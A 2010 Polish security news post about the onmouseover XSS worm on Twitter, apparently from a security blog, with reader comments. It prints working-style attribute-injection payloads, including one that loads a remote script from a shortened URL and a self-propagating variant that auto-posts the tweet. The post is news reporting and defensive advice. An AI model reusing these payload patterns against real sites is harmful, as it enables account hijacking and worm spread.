15:59
21/9/2010

XSS na Twitterze (onmouseover)

Jeśli chcecie zdobyć milion “followersów” musicie się śpieszyć ;-) Dzięki prostemu XSS-owi na Twitterze grasuje sobie właśnie robak. Ze względów bezpieczeństwa sugerujemy wylogowanie się z Twittera i korzystanie z “nieprzeglądarkowych” klientów do tego serwisu.

Robak na Twitterze

Bug został znaleziony przez użytkownika judofyr, który w demonstrującym atak “twitnięciu” umieścił instrukcję podmieniającą tło pod linkami na kolor czarny. Kolejne osoby dodały do tego hm… “exploita” (?) zdarzenie onmouseover wymuszające retwittowanie kodu i przekierowujące użytkowników na strony pornograficzne.

Twitter XSS

XSS w Twitterze

Kod “exploita”:
http://judofyr.net/@"style="background:#000;color:#000;/
Atak wykorzustuje błąd walidowania adresu URL w Twitterze. Cokolwiek, co znajduje się za “@” zostanie dołączone do URL w dodawanych na Twittera wpisach.

Po lekkich modyfikacjach, “payload” tego “exploita” może stać się groźniejszy:
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A ....
lub zacznie się sam rozprzestrzeniać:
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()

Wyłączenie JavaScriptu podczas korzystania z Twittera, wylogowanie się z serwisu, skorzystanie z innych niż przeglądarka klientów jest obecnie całkiem dobrym pomysłem…

Aktualizacja 16:09
Błąd jest już załatany — kto się pobawił, to się pobawił. Przeszukajcie sobie Twittera pod kątem “onmouseover” aby poznać skalę robaka ;-)

Przeczytaj także:

4 komentarzy

Dodaj komentarz
  1. Mobilny twitter działa i pozwala na kasowanie postów – to tak jakby ktoś musiał ;D

  2. […] P.S. Wzięliśmy plik na tapetę i przeczesujemy go pod kątem podejrzanych instrukcji. Jeśli znajdziemy w nim coś niepokojącego, zaktualizujemy ten post. W międzyczasie zastanówcie się, czy nie warto wyłączyć obsługi JavaScript w przeglądarce (przemawia za tym także dzisiejszy atak na Twitterze). […]

  3. Ciekawi mnie jak ten “robak” grasował sobie po Twitterze i jak zwabiał ofiary.

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: